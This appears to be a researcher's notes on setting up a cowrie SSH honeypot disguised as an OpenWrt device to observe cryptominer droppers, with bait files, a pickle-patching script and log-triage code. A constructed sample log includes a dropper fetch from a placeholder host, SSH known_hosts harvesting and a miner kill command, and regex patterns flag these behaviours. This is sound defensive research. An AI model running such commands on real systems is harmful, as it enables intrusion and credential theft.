~alienagain/honeypot_notes

notes from my honeypot project

#customized honeypot with cowrie

#1. Creating the basic honeypot

Following the cowrie install guide, I set up a cowrie environment on a VPS:

1.1 Moving the real sshd from port 22 to a port between 49152 and 65535 (the Port line in sshd_config), so that port 22 is free for the honeypot. Allow the new port in any firewall or cloud security group first, and keep the current session open until a login on the new port works.

sudo nvim /etc/ssh/sshd_config

1.2 Restart service

sudo systemctl restart ssh
sudo systemctl status ssh

1.3 Install software

sudo apt install -y python3-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind git

1.4 Create the cowrie user without a password

sudo adduser --disabled-password cowrie

1.5 Let authbind hand port 22 to the cowrie user (authbind was already installed in 1.3, so the apt line is redundant but harmless)

sudo apt install authbind
sudo touch /etc/authbind/byport/22
sudo chown cowrie:cowrie /etc/authbind/byport/22

1.6 Changing permissions

sudo chmod 770 /etc/authbind/byport/22

1.7 Switch to the cowrie user and go to its home directory

sudo su cowrie
cd ~

1.8 Clone the cowrie repo and enter it

git clone https://github.com/micheloosterhof/cowrie
cd cowrie

1.9 Create new configuration

cp etc/cowrie.cfg.dist etc/cowrie.cfg

1.10 Edit the config and replace 2222 (the default) with 22 in listen_endpoints, the port authbind was set up for

nvim etc/cowrie.cfg

in the file:

listen_endpoints = tcp:2222:interface=0.0.0.0

to

listen_endpoints = tcp:22:interface=0.0.0.0

1.11 Create a virtual environment and activate it

virtualenv cowrie-env
source cowrie-env/bin/activate

1.12 Upgrade pip inside the virtualenv

pip install --upgrade pip

1.13 Install the requirements

pip install --upgrade -r requirements.txt

1.14 Starting cowrie

bin/cowrie start

1.15 Check that cowrie is listening on port 22 and the real sshd on its new port

netstat -tan

#2. Customizing the whole thing

2.1 Copying a Docker image's filesystem

In my case I wanted to imitate an IoT Linux device to investigate SSH brute force related to cryptomining, so I copied the root filesystem of a Docker image based on OpenWrt. Logged out of the cowrie user and back as the default sudoer, I ran:

$ sudo docker create --name dummy openwrtorg/rootfs:x86-64
$ mkdir -p /tmp/picklefs
$ for i in proc usr sbin sys lib etc bin; do sudo docker cp dummy:/$i /tmp/picklefs; done

docker create only creates the container, which is all docker cp needs. The mkdir matters: if /tmp/picklefs does not exist yet, docker cp renames the first directory it copies to /tmp/picklefs instead of placing it inside. Add root to the list if you want /root present in the pickle for the .ssh bait in 2.3.

This is a copy of the relevant parts of the OpenWrt filesystem. To turn it into a cowrie pickle (the directory tree and metadata the fake shell navigates), as the cowrie user:

$ /home/cowrie/cowrie/bin/createfs -l /tmp/picklefs -d 6 -o /home/cowrie/cowrie/share/cowrie/honeyfs.pickle

-l is the local tree to walk, -d the maximum depth to descend, -o the output pickle. Run it on the copy, never on the real host filesystem.

cowrie loads share/cowrie/fs.pickle (the filesystem setting in cowrie.cfg), so I kept a backup of the original and renamed the new one over it:

$ cd /home/cowrie/cowrie/share/cowrie/
$ mv fs.pickle fs.pickle.orig
$ mv honeyfs.pickle fs.pickle

The pickle only holds the tree; the bytes an attacker gets from cat or scp come from the real files under /home/cowrie/cowrie/honeyfs (contents_path in cowrie.cfg), so the copy in /tmp has to go there too. cowrie reads etc/passwd and etc/group from this directory to resolve users and groups in the fake shell, so make sure those came across.

$ cd /home/cowrie/cowrie/honeyfs
$ rm -rf ./*
$ cp -r /tmp/picklefs/. .

The filesystem is in place, but I wanted to add some bait. Cryptominer droppers that arrive over SSH tend to do a few things:

  • Delete /etc/ld.so.preload (a common place for LD_PRELOAD-based hiding by competitors)
  • Read ~/.ssh (keys, known_hosts) to spread by SSH to hosts this one already trusts
  • Kill competing miners
  • Download further stages with wget and curl

So I wanted to leave the things those scripts look for in place, so that they run through their whole routine instead of failing early.

2.2 /etc/ld.so.preload

First an empty ld.so.preload. cowrie ships a small tool for editing the fake filesystem, fsctl; from the cowrie checkout:

$ sudo su cowrie
$ source cowrie-env/bin/activate
(cowrie-env) cowrie@<myvps>:~/cowrie$ ./bin/fsctl share/cowrie/fs.pickle

A shell opens, and then:

Kippo/Cowrie file system interactive editor
Donovan Hubbard, Douglas Hubbard, March 2013
Type 'help' for help

fs.pickle:/$ cd /etc/
fs.pickle:/etc$ touch ld.so.preload

The entry exists only in the pickle (size 0), which is enough: the dropper's rm -f /etc/ld.so.preload now succeeds and shows up in the command log instead of failing. Quit fsctl when done and restart cowrie, which reads the pickle only at startup.

2.3 Generating ssh content

As the cowrie user (the virtualenv is not needed for this), in /home/cowrie/cowrie/honeyfs. The root user's home in the OpenWrt passwd is /root, so the bait goes under root/.ssh there:

$ mkdir -p root/.ssh
$ ssh-keygen -t rsa -f root/.ssh/id_rsa -N ""

Never authorize that key anywhere real; it is bait. Later I connected to a beacon address with the same key and saved the resulting known_hosts in the same folder. If the client hashes known_hosts (HashKnownHosts yes, the Debian/Ubuntu default), the host names are unreadable and the bait is wasted, so write the entry unhashed. Then I added the same entries in the fsctl shell, because files that are missing from the pickle are invisible to the fake shell even when they exist under honeyfs.
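fsctl works, but it is interactive, so every rebuild of the pickle means retyping the same commands. The script below is an added example of mine (not cowrie's code and not part of the original notes) that adds the bait entries from 2.2 and 2.3 to a copy of fs.pickle directly. The node layout (10-element lists indexed by A_NAME..A_REALFILE) and the type codes are what I recall from cowrie/shell/fs.py and bin/createfs; treat them as an assumption to check against your checkout before writing over a real pickle. honeyfs is assumed to be cowrie's contents_path, from which cowrie fills in file contents at startup for entries that exist in the pickle.

```python
"""Add cryptominer bait to a cowrie-style fs.pickle without the interactive fsctl shell.

Added example for these notes, not cowrie's code.  The node layout and type codes
below are assumed from cowrie/shell/fs.py and bin/createfs; verify them against
your checkout before pointing this at a real fs.pickle.
"""
import os
import pickle
import time

# Field indices of one node (assumed from cowrie/shell/fs.py).
(A_NAME, A_TYPE, A_UID, A_GID, A_SIZE, A_MODE, A_CTIME,
 A_CONTENTS, A_TARGET, A_REALFILE) = range(10)
# Node types (assumed from cowrie/shell/fs.py).
T_LINK, T_DIR, T_FILE, T_BLK, T_CHR, T_SOCK, T_FIFO = range(7)

# The bait a dropper looks for: something to rm -f, and a ~/.ssh to harvest.
BAIT = {
    "/etc/ld.so.preload": 0o100644,
    "/root/.ssh/id_rsa": 0o100600,
    "/root/.ssh/id_rsa.pub": 0o100644,
    "/root/.ssh/known_hosts": 0o100644,
}


def new_node(name, ntype, mode, size=0):
    """One tree node; directories keep their children in A_CONTENTS. Owner is root."""
    children = [] if ntype == T_DIR else None
    return [name, ntype, 0, 0, size, mode, int(time.time()), children, None, None]


def child(node, name):
    """Direct child of a directory node by name, or None."""
    if node[A_TYPE] != T_DIR:
        return None
    return next((c for c in node[A_CONTENTS] if c[A_NAME] == name), None)


def lookup(root, path):
    """Node for an absolute path, or None if any component is missing."""
    node = root
    for part in path.strip("/").split("/"):
        if part:
            node = child(node, part)
            if node is None:
                return None
    return node


def ensure_dir(root, path, mode=0o40755):
    """mkdir -p inside the tree; returns the final directory node."""
    node = root
    for part in path.strip("/").split("/"):
        if not part:
            continue
        nxt = child(node, part)
        if nxt is None:
            nxt = new_node(part, T_DIR, mode)
            node[A_CONTENTS].append(nxt)
        node = nxt
    return node


def ensure_file(root, path, mode, size=0):
    """touch inside the tree; existing entries are left alone (idempotent)."""
    parent = ensure_dir(root, os.path.dirname(path))
    existing = child(parent, os.path.basename(path))
    if existing is not None:
        return existing
    node = new_node(os.path.basename(path), T_FILE, mode, size)
    parent[A_CONTENTS].append(node)
    return node


def add_miner_bait(root, honeyfs):
    """Create every BAIT entry that is not there yet and return the paths added.
    The size comes from the matching file under honeyfs (cowrie's contents_path)
    when it exists, so ls -l agrees with cat; /root/.ssh is created 0700."""
    ensure_dir(root, "/root/.ssh", mode=0o40700)
    added = []
    for path, mode in BAIT.items():
        real = os.path.join(honeyfs, path.lstrip("/"))
        size = os.path.getsize(real) if os.path.isfile(real) else 0
        if lookup(root, path) is None:
            ensure_file(root, path, mode, size)
            added.append(path)
    return added


def patch_pickle(src, dst, honeyfs):
    """Load src, add the bait, write dst (write a new file, then mv it over fs.pickle)."""
    with open(src, "rb") as f:
        root = pickle.load(f)
    added = add_miner_bait(root, honeyfs)
    with open(dst, "wb") as f:
        pickle.dump(root, f)
    return added


if __name__ == "__main__":
    import sys
    # e.g. python add_bait.py share/cowrie/fs.pickle share/cowrie/fs.pickle.new honeyfs
    print(patch_pickle(sys.argv[1], sys.argv[2], sys.argv[3]))
```

Write to a new file, move it over share/cowrie/fs.pickle and restart cowrie; keep the real files from 2.3 under honeyfs so that the sizes in ls -l and the contents returned by cat agree.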

2.4 Deleting competition and configuring wget and curl

cowrie's txtcmds mechanism prints a text file verbatim when a command is run: a file at share/cowrie/txtcmds/<path of the binary in the fake filesystem> stands in for that binary. In /home/cowrie/cowrie/share/cowrie/txtcmds/bin I created curl and wget with fake error messages:

$ touch curl wget
$ nvim curl
...
$ nvim wget
...

Two caveats. The txtcmds path has to mirror where the binary lives in the pickle (on the OpenWrt image wget is /usr/bin/wget, so the file belongs under txtcmds/usr/bin/; check with ls -l in the fake shell). And cowrie ships its own curl and wget emulations (cowrie/commands/curl.py and wget.py) that really fetch the URL and keep a copy under var/lib/cowrie/downloads; getCommand in cowrie/shell/protocol.py consults the built-in command table before txtcmds, so a txtcmds curl or wget is shadowed while those modules are loaded (verify on your version). For a cryptominer study the built-in behaviour is usually what you want anyway, since it captures the dropper.

Since I was already doing this I added a txtcmds entry for ufw too; its output lists fake services with names commonly seen in other cryptominers, so any enumeration is visible in the logs.

#3. Testing

When everything was done I tested it. With the virtualenv active, in the cowrie repo directory:

$ bin/cowrie stop
$ bin/cowrie start

And attempted to connect using another console:

$ ssh -p 22 root@<myip>

I played around a bit in the fake shell and exited, then looked at cowrie/var/log/cowrie: cowrie.log is the text log and cowrie.json the JSON event log, both rotated daily with a date suffix. After a day I saw in the logs how some IPs attempted to connect, so I wrote a script to extract them:

#!/bin/bash
# Collect the unique source IPs that connected yesterday.
# Run from cowrie/var/log/cowrie, where cowrie writes one cowrie.json.YYYY-MM-DD per day.
yesterday=$(date -d "yesterday 13:00" '+%Y-%m-%d')
grep "New connection:" "cowrie.json.$yesterday" > connections

while read -r line; do
        # the message field reads: New connection: <src_ip>:<src_port> (<dst_ip>:22) [session: ...]
        step1=${line##*connection:}     # keep what follows "connection:"
        step2=${step1%%(*}              # drop the "(dst_ip:dst_port) ..." tail, leaving " src_ip:src_port "
        ip=${step2%%:*}                 # drop the source port, so the same IP is one entry
        echo "${ip// /}" >> collectedIPs_raw
done < connections

# de-duplicate, keeping first-seen order
awk '!a[$0]++' collectedIPs_raw > collectedIPs

rm collectedIPs_raw connections

I then looked up the IPs in collectedIPs, ignoring my own. I also wanted the commands, so:

#!/bin/bash
# Collect yesterday's command lines (cowrie.command.input events carry an "input" field).
yesterday=$(date -d "yesterday 13:00" '+%Y-%m-%d')
grep '"input"' "cowrie.json.$yesterday" > commands
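The two scripts above grep the JSON as text. cowrie.json is one JSON object per line, so parsing it as JSON is simpler and lets you join connections and commands on the session id. The following is an added example of mine (not part of these notes and not cowrie's code) that does what both scripts do and also flags sessions that go through the cryptominer routine from section 2. The event names and fields (cowrie.session.connect with src_ip and session, cowrie.command.input with input and session) are the ones cowrie writes; the log lines in SAMPLE_LOG are constructed, not captured, the addresses are documentation ranges, and the indicator patterns are my own heuristics.

```python
"""Pull source IPs and commands out of cowrie's JSON log and flag the sessions
that go through the cryptominer routine (ld.so.preload removal, ~/.ssh harvesting,
killing competitors, fetching further stages).

Added example for these notes, not code from the original or from cowrie.
SAMPLE_LOG is constructed, not a captured log.
"""
import json
import re
from collections import defaultdict

# Constructed stand-in for one day's cowrie.json.YYYY-MM-DD (one JSON object per line).
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":40210,"dst_ip":"10.0.0.5","dst_port":22,"session":"a1b2c3d4","protocol":"ssh","message":"New connection: 203.0.113.7:40210 (10.0.0.5:22) [session: a1b2c3d4]","timestamp":"2024-05-01T02:11:03.101Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","session":"a1b2c3d4","src_ip":"203.0.113.7","message":"login attempt [root/admin] succeeded","timestamp":"2024-05-01T02:11:04.220Z"}
{"eventid":"cowrie.command.input","input":"rm -f /etc/ld.so.preload","session":"a1b2c3d4","src_ip":"203.0.113.7","message":"CMD: rm -f /etc/ld.so.preload","timestamp":"2024-05-01T02:11:05.004Z"}
{"eventid":"cowrie.command.input","input":"pkill -9 xmrig; cat /root/.ssh/known_hosts","session":"a1b2c3d4","src_ip":"203.0.113.7","message":"CMD: pkill -9 xmrig; cat /root/.ssh/known_hosts","timestamp":"2024-05-01T02:11:05.310Z"}
{"eventid":"cowrie.command.input","input":"curl -fsSL http://198.51.100.9/dropper.sh -o /tmp/d.sh || wget -q http://198.51.100.9/dropper.sh -O /tmp/d.sh","session":"a1b2c3d4","src_ip":"203.0.113.7","message":"CMD: curl -fsSL http://198.51.100.9/dropper.sh -o /tmp/d.sh || wget -q http://198.51.100.9/dropper.sh -O /tmp/d.sh","timestamp":"2024-05-01T02:11:06.002Z"}
{"eventid":"cowrie.session.closed","duration":4.1,"session":"a1b2c3d4","src_ip":"203.0.113.7","message":"Connection lost after 4 seconds","timestamp":"2024-05-01T02:11:08.000Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","src_port":40999,"dst_ip":"10.0.0.5","dst_port":22,"session":"e5f6a7b8","protocol":"ssh","message":"New connection: 203.0.113.7:40999 (10.0.0.5:22) [session: e5f6a7b8]","timestamp":"2024-05-01T03:40:12.500Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.42","src_port":51234,"dst_ip":"10.0.0.5","dst_port":22,"session":"c9d0e1f2","protocol":"ssh","message":"New connection: 198.51.100.42:51234 (10.0.0.5:22) [session: c9d0e1f2]","timestamp":"2024-05-01T05:02:44.731Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","session":"c9d0e1f2","src_ip":"198.51.100.42","message":"login attempt [admin/123456] failed","timestamp":"2024-05-01T05:02:45.100Z"}
"""

# Behaviours from section 2, as my own patterns over the raw command line.
INDICATORS = {
    "ld_preload_removal": re.compile(r"\brm\b.*\bld\.so\.preload\b"),
    "ssh_key_harvest": re.compile(r"\.ssh/(known_hosts|id_[a-z0-9]+|authorized_keys)"),
    "stage_download": re.compile(r"\b(wget|curl)\b"),
    "kill_competition": re.compile(r"\b(pkill|killall|kill -9)\b"),
}


def parse_events(text):
    """Events from a cowrie.json stream, skipping blank or truncated lines
    (the last line is often half-written while cowrie is still running)."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def connecting_ips(events, ignore=()):
    """Unique source IPs in first-seen order, minus your own test addresses."""
    seen = []
    for ev in events:
        if ev.get("eventid") == "cowrie.session.connect":
            ip = ev.get("src_ip")
            if ip and ip not in ignore and ip not in seen:
                seen.append(ip)
    return seen


def commands_by_session(events):
    """session id -> the command lines typed in that session, in order."""
    cmds = defaultdict(list)
    for ev in events:
        if ev.get("eventid") == "cowrie.command.input" and ev.get("session"):
            cmds[ev["session"]].append(ev.get("input", ""))
    return dict(cmds)


def classify_session(commands):
    """Sorted names of the indicators that fire on a session's commands."""
    return sorted(name for name, pat in INDICATORS.items()
                  if any(pat.search(cmd) for cmd in commands))


def miner_like_sessions(events, min_indicators=2):
    """session id -> (src_ip, indicators) for sessions showing at least
    min_indicators of the behaviours; a lone wget is not a miner."""
    src = {ev["session"]: ev.get("src_ip")
           for ev in events if ev.get("eventid") == "cowrie.session.connect"}
    flagged = {}
    for sid, cmds in commands_by_session(events).items():
        tags = classify_session(cmds)
        if len(tags) >= min_indicators:
            flagged[sid] = (src.get(sid), tags)
    return flagged


if __name__ == "__main__":
    import sys
    # python cowrie_triage.py cowrie/var/log/cowrie/cowrie.json.2024-05-01
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    events = parse_events(text)
    print("source IPs:", ", ".join(connecting_ips(events)))
    for sid, (ip, tags) in miner_like_sessions(events).items():
        print(f"{sid} from {ip}: {', '.join(tags)}")
```

Pass your own address in ignore so the test logins from section 3 do not end up in the IP list; the min_indicators threshold is there because a single wget or a single kill is routine noise, while the full routine in one session is what the bait in section 2 was built to attract.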

On my local machine I fetched those files with:

#!/bin/bash

if [ "$1" = "IPS" ]; then
	echo "collecting IPs"
	scp -P <my_real_port> <myuser>@<myip>:/home/cowrie/cowrie/var/log/cowrie/collectedIPs .
elif [ "$1" = "commands" ]; then
	echo "collecting commands"
	scp -P <my_real_port> <myuser>@<myip>:/home/cowrie/cowrie/var/log/cowrie/commands .
else
	echo "ERROR"
fi

So all I had to do is:

$ myscript IPS

or:

$ myscript commands

#4. Beacons

As I said, most cryptominers try to delete their competitors. I created a realistic kinsing-style sample which downloads a "cryptomining binary" from a web server I also host myself. The rest of the sample looks exactly like a real kinsing miner downloader.

The binary is an ELF compiled from bash which contains some real but harmless miner strings that trigger the YARA rules for Linux miners, and which also attempts to SSH into the honeypot shell in a one-liner. I uploaded both to VT, the fake downloader and the fake binary :)

#5. Conclusions

So far a few IPs have attempted to connect; most of them are DigitalOcean IPs related to malware and SSH brute-forcers. A couple of them attempted a TLS handshake, i.e. tried to speak HTTPS to the SSH port.